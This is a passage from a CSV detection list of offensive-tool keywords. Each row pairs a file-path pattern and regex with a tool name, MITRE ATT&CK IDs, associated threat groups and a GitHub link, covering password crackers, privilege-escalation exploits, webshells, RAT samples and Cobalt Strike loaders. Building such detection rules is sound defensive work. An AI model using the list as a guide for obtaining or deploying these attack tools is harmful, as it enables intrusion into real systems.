tool","https://github.com/jiansiting/CVE-2020-5902","1","0","#linux","N/A","N/A","1","5","5","2020-07-07T02:03:40Z","2020-07-07T02:03:39Z","8237" "*/Jira-Lens.git*",".{0,1000}\/Jira\-Lens\.git.{0,1000}","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","N/A","4","318","52","2024-12-31T20:06:51Z","2021-11-14T18:37:47Z","8238" "*/Jira-Lens/*",".{0,1000}\/Jira\-Lens\/.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Fast and customizable vulnerability scanner For JIRA written in Python","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","N/A","4","318","52","2024-12-31T20:06:51Z","2021-11-14T18:37:47Z","8239" "*/JoelGMSec/PyShell*",".{0,1000}\/JoelGMSec\/PyShell.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. 
Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","8240" "*/john -*",".{0,1000}\/john\s\-.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","8241" "*/john.git*",".{0,1000}\/john\.git.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","EMBER BEAR","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","10","1242","201","2025-04-06T13:31:57Z","2016-05-24T18:46:56Z","8242" "*/john/run/*.pl*",".{0,1000}\/john\/run\/.{0,1000}\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","8243" "*/john/run/*.py*",".{0,1000}\/john\/run\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","8244" "*/john_the_ripper_cracker.py*",".{0,1000}\/john_the_ripper_cracker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment 
pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","8245" "*/JohnTheRipper*",".{0,1000}\/JohnTheRipper.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","8246" "*/Jomungand.git*",".{0,1000}\/Jomungand\.git.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","N/A","10","","N/A","","","","8247" "*/Jordan RAT.exe*",".{0,1000}\/Jordan\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","8248" "*/Jormungand.sln*",".{0,1000}\/Jormungand\.sln.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","N/A","10","","N/A","","","","8249" "*/Jormungandr.git*",".{0,1000}\/Jormungandr\.git.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - 
TA0002","N/A","N/A","Exploitation tool","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","N/A","3","228","27","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z","8250" "*/jRAT v0.8d.exe*",".{0,1000}\/jRAT\sv0\.8d\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","8260" "*/js_inject.txt*",".{0,1000}\/js_inject\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","8261" "*/juicypotato*",".{0,1000}\/juicypotato.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8262" "*/JuicyPotato.exe*",".{0,1000}\/JuicyPotato\.exe.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","1","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","8263" "*/JuicyPotato.git*",".{0,1000}\/JuicyPotato\.git.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","1","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","8264" "*/JuicyPotato.x64.dll*",".{0,1000}\/JuicyPotato\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8265" "*/JuicyPotato.x86.dll*",".{0,1000}\/JuicyPotato\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8266" "*/JuicyPotato_x32.exe*",".{0,1000}\/JuicyPotato_x32\.exe.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","1","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","8267" "*/JuicyPotato_x64.exe*",".{0,1000}\/JuicyPotato_x64\.exe.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","1","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","8268" "*/JuicyPotatoNG.git*",".{0,1000}\/JuicyPotatoNG\.git.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to 
System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","8269" "*/JuicyPotato-webshell/*",".{0,1000}\/JuicyPotato\-webshell\/.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","1","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","8270" "*/Jump-exec/Psexec*",".{0,1000}\/Jump\-exec\/Psexec.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","8271" "*/JumpSession.cna*",".{0,1000}\/JumpSession\.cna.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","N/A","9","1","80","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z","8272" "*/JumpSession_BOF.git*",".{0,1000}\/JumpSession_BOF\.git.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - 
TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","N/A","9","1","80","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z","8273" "*/k msg * Hello from Dirty Vanity*",".{0,1000}\/k\smsg\s.{0,1000}\sHello\sfrom\sDirty\sVanity.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","8274" "*/k msg * Hello from Tam.Men*",".{0,1000}\/k\smsg\s.{0,1000}\sHello\sfrom\sTam\.Men.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","8275" "*/K8_CS_*_*.rar*",".{0,1000}\/K8_CS_.{0,1000}_.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","8276" "*/k8gege/*",".{0,1000}\/k8gege\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","8277" "*/k8gege/scrun/*",".{0,1000}\/k8gege\/scrun\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/scrun","1","1","N/A","N/A","10","10","179","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z","8278" "*/k8gege520*",".{0,1000}\/k8gege520.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","8279" "*/ka0tic.pl*",".{0,1000}\/ka0tic\.pl.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","8280" 
"*/ka7ana/CVE*.ps1*",".{0,1000}\/ka7ana\/CVE.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","poc","Simple PoC in PowerShell for CVE-2023-23397","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","APT28 - STRONTIUM - Sednit - Sofacy - Fancy Bear","Exploitation tool","https://github.com/ka7ana/CVE-2023-23397","1","1","N/A","N/A","N/A","1","40","12","2023-03-16T19:29:49Z","2023-03-16T19:10:37Z","8281" "*/KAdot Universal Shell v0.1.6.php*",".{0,1000}\/KAdot\sUniversal\sShell\sv0\.1\.6\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","8282" "*/kali/pool/main/*",".{0,1000}\/kali\/pool\/main\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","8283" "*/kalilinux/packages/winexe*",".{0,1000}\/kalilinux\/packages\/winexe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","8284" "*/kali-linux-2023*",".{0,1000}\/kali\-linux\-2023.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","8285" "*/kali-tools-*",".{0,1000}\/kali\-tools\-.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - 
T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","8286" "*/karmaSMB.exe*",".{0,1000}\/karmaSMB\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8287" "*/karmaSMB.py*",".{0,1000}\/karmaSMB\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8288" "*/katoolin3*",".{0,1000}\/katoolin3.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/s-h-3-l-l/katoolin3","1","1","#linux","N/A","N/A","4","370","120","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z","8289" "*/KaynLdr.git*",".{0,1000}\/KaynLdr\.git.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","8290" "*/KaynStrike.cna*",".{0,1000}\/KaynStrike\.cna.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","8291" 
"*/KaynStrike.git*",".{0,1000}\/KaynStrike\.git.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","8292" "*/KCMTicketFormatter*",".{0,1000}\/KCMTicketFormatter.{0,1000}","offensive_tool_keyword","KCMTicketFormatter","Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems","T1558.003 - T1550.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/blacklanternsecurity/KCMTicketFormatter","1","0","#linux","N/A","7","1","37","4","2021-05-26T20:23:56Z","2021-05-26T20:17:33Z","8293" "*/kdstab.*",".{0,1000}\/kdstab\..{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 